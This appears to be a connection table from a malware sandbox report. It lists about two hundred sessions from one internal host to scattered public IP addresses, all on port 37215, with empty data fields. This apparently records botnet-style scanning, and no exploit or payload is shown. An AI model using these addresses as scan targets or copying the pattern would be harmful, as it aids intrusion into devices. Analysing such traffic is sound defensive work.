                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14175192.168.2.1344148197.13.223.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14176192.168.2.1355098121.70.254.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14177192.168.2.1349614157.61.95.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14178192.168.2.1360430157.98.120.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14179192.168.2.1359836197.47.165.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14180192.168.2.134205641.161.20.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14181192.168.2.134410841.229.95.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14182192.168.2.135763641.30.236.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14183192.168.2.1352466157.41.120.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14184192.168.2.1357442154.78.255.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14185192.168.2.133887641.23.58.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14186192.168.2.133893641.232.142.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14187192.168.2.1335554157.58.174.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14188192.168.2.1357014202.130.37.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14189192.168.2.1359226151.173.118.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14190192.168.2.1344956157.26.230.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14191192.168.2.1351888157.50.253.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192192.168.2.1353960157.193.90.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14193192.168.2.1340266157.8.122.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14194192.168.2.134517041.197.24.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14195192.168.2.1340656205.39.233.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14196192.168.2.13465621.3.51.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14197192.168.2.133640441.200.101.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14198192.168.2.1338354197.168.207.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14199192.168.2.1360364197.108.80.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14200192.168.2.1335590197.112.248.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14201192.168.2.1347308197.70.15.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14202192.168.2.135297841.222.94.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14203192.168.2.1337902157.39.10.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14204192.168.2.1336926160.195.209.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14205192.168.2.134589441.27.232.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14206192.168.2.1346058197.45.180.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14207192.168.2.1340672157.103.159.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14208192.168.2.1334328221.128.145.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14209192.168.2.1359446157.235.210.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14210192.168.2.1336330157.74.187.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14211192.168.2.1338078157.99.171.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14212192.168.2.1337670197.253.66.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14213192.168.2.134002841.254.59.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14214192.168.2.1345996185.200.111.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14215192.168.2.1338110157.100.220.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14216192.168.2.1333098197.201.171.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14217192.168.2.1346796157.104.29.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14218192.168.2.1343242157.101.168.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14219192.168.2.1350514157.179.40.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14220192.168.2.1356568135.42.154.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14221192.168.2.1339776157.130.115.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14222192.168.2.133414073.36.151.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14223192.168.2.133555241.253.12.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14224192.168.2.134230641.227.141.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14225192.168.2.1338554157.192.219.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14226192.168.2.1341220197.105.215.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14227192.168.2.1345614157.206.102.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14228192.168.2.136096441.144.117.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14229192.168.2.1348002157.185.226.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14230192.168.2.134285641.70.138.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14231192.168.2.133794041.120.99.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14232192.168.2.134726441.50.32.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14233192.168.2.133966294.31.70.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14234192.168.2.134238241.19.208.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14235192.168.2.1335458162.90.130.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14236192.168.2.135205841.118.41.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14237192.168.2.1349088197.92.194.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14238192.168.2.1337652191.148.43.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14239192.168.2.1347582186.43.240.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14240192.168.2.1340760197.200.230.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14241192.168.2.1349266197.189.176.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14242192.168.2.1357452157.137.206.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14243192.168.2.1338144157.187.249.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14244192.168.2.134836841.205.74.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14245192.168.2.135503841.31.76.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14246192.168.2.1345380157.187.62.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14247192.168.2.1346634157.52.80.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14248192.168.2.135760641.173.227.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14249192.168.2.1356198196.155.100.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14250192.168.2.1337272197.13.181.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14251192.168.2.134502041.76.137.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14252192.168.2.1348854197.159.201.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14253192.168.2.135442641.135.114.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14254192.168.2.1335276157.134.24.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14255192.168.2.1358756197.27.128.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14256192.168.2.1351444197.83.110.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14257192.168.2.135500041.240.37.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14258192.168.2.1339448197.5.109.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14259192.168.2.1342060192.10.114.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14260192.168.2.1337204124.158.134.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14261192.168.2.134113641.47.61.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14262192.168.2.134594441.19.143.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14263192.168.2.1358686221.99.71.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14264192.168.2.1333412156.174.252.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14265192.168.2.1352566157.52.17.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14266192.168.2.1343810186.237.168.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14267192.168.2.1336092157.238.5.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14268192.168.2.1336382157.1.176.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14269192.168.2.1333530157.168.127.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14270192.168.2.1333176197.247.35.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14271192.168.2.1349494197.47.248.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14272192.168.2.1347318157.47.98.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14273192.168.2.134252441.94.230.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14274192.168.2.135998641.159.51.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14275192.168.2.1354846157.45.87.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14276192.168.2.1352314142.52.86.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14277192.168.2.134063851.45.183.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14278192.168.2.135885041.14.60.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14279192.168.2.1357138197.94.145.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14280192.168.2.135328241.132.188.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14281192.168.2.133421479.15.89.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14282192.168.2.134727441.153.202.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14283192.168.2.135934441.228.111.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14284192.168.2.1336722163.55.134.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14285192.168.2.135024041.11.15.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14286192.168.2.1336116197.212.59.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14287192.168.2.1337364200.137.204.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14288192.168.2.1348052194.5.78.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14289192.168.2.1344986223.57.216.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14290192.168.2.1350674130.134.59.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14291192.168.2.1335484157.109.64.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14292192.168.2.135984841.137.147.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14293192.168.2.1333692138.75.77.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14294192.168.2.135019895.221.104.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14295192.168.2.1350726113.144.196.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14296192.168.2.1347954197.143.110.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14297192.168.2.133370018.23.56.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14298192.168.2.1348126157.89.97.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14299192.168.2.133587441.70.83.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14300192.168.2.1350896197.70.212.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14301192.168.2.135098441.100.184.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14302192.168.2.1334394157.35.55.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14303192.168.2.1350310157.111.3.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14304192.168.2.1337478157.144.100.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14305192.168.2.134936041.180.126.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14306192.168.2.1350536157.190.219.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14307192.168.2.1352970157.130.156.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14308192.168.2.1338778197.38.23.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14309192.168.2.1353772157.14.89.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14310192.168.2.134776241.15.216.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14311192.168.2.135385241.241.232.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14312192.168.2.1346138157.113.88.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14313192.168.2.1355582197.159.221.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14314192.168.2.1353400157.30.100.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14315192.168.2.1355604197.174.28.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14316192.168.2.1351950197.155.60.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14317192.168.2.1357392197.166.248.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14318192.168.2.133605441.54.8.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14319192.168.2.1343684197.47.61.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14320192.168.2.1352480124.28.96.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14321192.168.2.1344148157.254.147.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14322192.168.2.1349918197.151.102.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14323192.168.2.135003841.4.190.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14324192.168.2.1335920197.19.122.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14325192.168.2.1345730157.43.22.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14326192.168.2.1336628197.164.134.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14327192.168.2.134704841.140.207.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14328192.168.2.1358434197.17.19.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14329192.168.2.134945469.100.197.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14330192.168.2.1344198157.102.250.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14331192.168.2.1332948197.144.88.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14332192.168.2.1356630157.56.4.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14333192.168.2.1333808157.46.49.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14334192.168.2.134996441.141.229.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14335192.168.2.1340068197.52.46.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14336192.168.2.1336466157.191.31.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14337192.168.2.134860841.160.158.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14338192.168.2.1334808171.25.180.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14339192.168.2.134791641.88.156.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14340192.168.2.1350140192.181.101.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14341192.168.2.134304041.209.89.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14342192.168.2.135153641.114.140.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14343192.168.2.1354834197.1.130.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14344192.168.2.1356724157.35.204.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14345192.168.2.1344098197.41.146.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14346192.168.2.133974465.85.70.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14347192.168.2.1338820197.81.174.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14348192.168.2.134961241.158.201.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14349192.168.2.133437441.209.107.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14350192.168.2.1336798157.207.250.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14351192.168.2.135049841.62.227.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14352192.168.2.134070439.136.21.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14353192.168.2.1351924197.18.31.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14354192.168.2.1341468157.202.201.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14355192.168.2.1353856157.192.223.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14356192.168.2.1344536157.151.253.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14357192.168.2.134699441.238.140.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14358192.168.2.1343430157.3.231.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14359192.168.2.1355296157.189.48.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14360192.168.2.1337334197.60.193.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14361192.168.2.1349392135.189.224.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14362192.168.2.133540041.169.243.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14363192.168.2.1334146197.63.96.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14364192.168.2.1346658101.32.31.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14365192.168.2.1355658197.83.2.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14366192.168.2.135462641.66.83.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14367192.168.2.1354258157.185.159.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14368192.168.2.1351502126.241.145.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14369192.168.2.133641641.186.128.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14370192.168.2.1355522197.13.226.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14371192.168.2.1333420157.202.164.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14372192.168.2.1357044157.103.60.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14373192.168.2.1335444197.187.190.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14374192.168.2.1338514203.99.84.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14375192.168.2.134424441.170.121.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14376192.168.2.1338830209.236.216.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14377192.168.2.1353208157.0.229.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14378192.168.2.1358268197.215.118.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14379192.168.2.1347020157.81.171.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14380192.168.2.1356316157.119.193.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14381192.168.2.134586641.255.114.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14382192.168.2.1356932197.42.53.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14383192.168.2.1337542157.139.235.4837215
                                                  TimestampBytes transferredDirectionData


